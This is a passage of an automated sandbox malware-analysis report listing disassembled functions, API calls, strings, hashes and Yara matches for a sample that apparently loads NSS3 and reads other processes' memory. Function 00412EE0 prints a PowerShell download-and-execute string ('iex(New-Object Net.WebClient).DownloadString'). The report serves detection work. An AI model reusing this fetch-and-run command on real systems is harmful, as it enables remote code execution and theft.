                                                                                                                                              • Instruction Fuzzy Hash: E11178B1F001155BEB008B659E49FAA37AC9B41359F544034ED09D7B81EB71EA19C7A1
                                                                                                                                              Function 6C793C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C793D3F
                                                                                                                                                • Part of subcall function 6C70BA90: PORT_NewArena_Util.NSS3(00000800,6C793CAF,?), ref: 6C70BABF
                                                                                                                                                • Part of subcall function 6C70BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C793CAF,?), ref: 6C70BAD5
                                                                                                                                                • Part of subcall function 6C70BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C793CAF,?), ref: 6C70BB08
                                                                                                                                                • Part of subcall function 6C70BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C793CAF,?), ref: 6C70BB1A
                                                                                                                                                • Part of subcall function 6C70BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C793CAF,?), ref: 6C70BB3B
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C793CCB
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90AB
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C90C9
                                                                                                                                                • Part of subcall function 6C7C9090: EnterCriticalSection.KERNEL32 ref: 6C7C90E5
                                                                                                                                                • Part of subcall function 6C7C9090: TlsGetValue.KERNEL32 ref: 6C7C9116
                                                                                                                                                • Part of subcall function 6C7C9090: LeaveCriticalSection.KERNEL32 ref: 6C7C913F
                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C793CE2
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C793CF8
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C793D15
                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C793D2E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4030862364-0
                                                                                                                                              • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                              • Instruction ID: eb3d66c16ff560bc952150f95b0a9d8406aa99f31ee5bc8aad498a7aa86347b0
                                                                                                                                              • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                              • Instruction Fuzzy Hash: 3B11E2B5A10600AFF7205A65FE8AB9BB2E4AB1130DF504534E41E8BB61E632E919C653
                                                                                                                                              Function 6C75FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C75FE08
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C75FE1D
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76116E
                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C75FE29
                                                                                                                                              • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C75FE3D
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C75FE62
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6C75FE6F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 660648399-0
                                                                                                                                              • Opcode ID: 22648466e61affb551e79afd1c79f0c1ac1a35201c00076f4e1d0f6893526741
                                                                                                                                              • Instruction ID: 3e9c49d55286facb0a5e8a001848568f0da1a5d593b346a8e3efd70e902a1a29
                                                                                                                                              • Opcode Fuzzy Hash: 22648466e61affb551e79afd1c79f0c1ac1a35201c00076f4e1d0f6893526741
                                                                                                                                              • Instruction Fuzzy Hash: 07110CB67012456BEB004F65ED48A5B73DCAF54399F548034ED1D87F12EB31E924CB91
                                                                                                                                              Function 6C80FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_Lock.NSS3 ref: 6C80FD9E
                                                                                                                                                • Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
                                                                                                                                                • Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8
                                                                                                                                              • PR_WaitCondVar.NSS3(000000FF), ref: 6C80FDB9
                                                                                                                                                • Part of subcall function 6C6EA900: TlsGetValue.KERNEL32(00000000,?,6C8614E4,?,6C684DD9), ref: 6C6EA90F
                                                                                                                                                • Part of subcall function 6C6EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6EA94F
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C80FDD4
                                                                                                                                              • PR_Lock.NSS3 ref: 6C80FDF2
                                                                                                                                              • PR_NotifyAllCondVar.NSS3 ref: 6C80FE0D
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C80FE23
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3365241057-0
                                                                                                                                              • Opcode ID: 6f8a52d335418de6fc89113cd132bc7bed251e048130b022acf70e3fa59c141d
                                                                                                                                              • Instruction ID: eaa54d5b863c20afa3551d550dea2b2534dfb591bfcdfff414a3d8b64278615f
                                                                                                                                              • Opcode Fuzzy Hash: 6f8a52d335418de6fc89113cd132bc7bed251e048130b022acf70e3fa59c141d
                                                                                                                                              • Instruction Fuzzy Hash: A10182B6A04201AFDF254E16FD048527632BB2236C7154775E82547BA2EB22DD28C6C6
                                                                                                                                              Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 0041CD1A
                                                                                                                                                • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                                                                • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041CD3A
                                                                                                                                              • __lock.LIBCMT ref: 0041CD4A
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                                                                                                                              • free.MSVCRT ref: 0041CD7A
                                                                                                                                              • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 634100517-0
                                                                                                                                              • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                                                                                                                              • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                                                                                                                              • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                                                                                                                              • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                                                                                                                              Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 0041719F
                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                                                                                                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                                                                                                                                • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                                                                                                                              • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                                                                                                                                • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 2950663791-2766056989
                                                                                                                                              • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                                                              • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                                                                                                                              • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                                                              • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                                                                                                                              Function 6C74FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C74FC55
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C74FCB2
                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C74FDB7
                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C74FDDE
                                                                                                                                                • Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,6C76085A,00000000,?,6C708369,?), ref: 6C758821
                                                                                                                                                • Part of subcall function 6C758800: TlsGetValue.KERNEL32(?,?,6C76085A,00000000,?,6C708369,?), ref: 6C75883D
                                                                                                                                                • Part of subcall function 6C758800: EnterCriticalSection.KERNEL32(?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758856
                                                                                                                                                • Part of subcall function 6C758800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C758887
                                                                                                                                                • Part of subcall function 6C758800: PR_Unlock.NSS3(?,?,?,?,6C76085A,00000000,?,6C708369,?), ref: 6C758899
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                              • String ID: pkcs11:
                                                                                                                                              • API String ID: 362709927-2446828420
                                                                                                                                              • Opcode ID: 2b9d3280f9eea6518793e466ca9a1f5c50d1d11e797385f9778b879fc91a7f42
                                                                                                                                              • Instruction ID: 9acd59750a28840407b7a6501f01514909edeba5a911184926c5cc3db70710bb
                                                                                                                                              • Opcode Fuzzy Hash: 2b9d3280f9eea6518793e466ca9a1f5c50d1d11e797385f9778b879fc91a7f42
                                                                                                                                              • Instruction Fuzzy Hash: F451F0B1A40211ABEB108F699F4AFAA3365AF4135CF548075DD146BB81EB30E814CFA2
                                                                                                                                              Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: zn@$zn@
                                                                                                                                              • API String ID: 1029625771-1156428846
                                                                                                                                              • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                                                              • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                                                                                                                              • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                                                              • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                                                                                                                              Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5
                                                                                                                                              Strings
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
                                                                                                                                              • <, xrefs: 00412F89
                                                                                                                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
                                                                                                                                              • ')", xrefs: 00412F03
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                                                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              • API String ID: 3031569214-898575020
                                                                                                                                              • Opcode ID: d0822afccd21bce7abf9f68e5bec5377d5fc9d972d7989ef2a528f757283460a
                                                                                                                                              • Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
                                                                                                                                              • Opcode Fuzzy Hash: d0822afccd21bce7abf9f68e5bec5377d5fc9d972d7989ef2a528f757283460a
                                                                                                                                              • Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99
                                                                                                                                              Function 6C68BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C68BE02
                                                                                                                                                • Part of subcall function 6C7B9C40: memcmp.VCRUNTIME140(?,00000000,6C68C52B), ref: 6C7B9D53
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68BE9F
                                                                                                                                              Strings
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C68BE98
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68BE89
                                                                                                                                              • database corruption, xrefs: 6C68BE93
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 1135338897-598938438
                                                                                                                                              • Opcode ID: 543463517c4c037c1904ecc1e57fb459065f4de38996540a2ba8dd0db2e6fad7
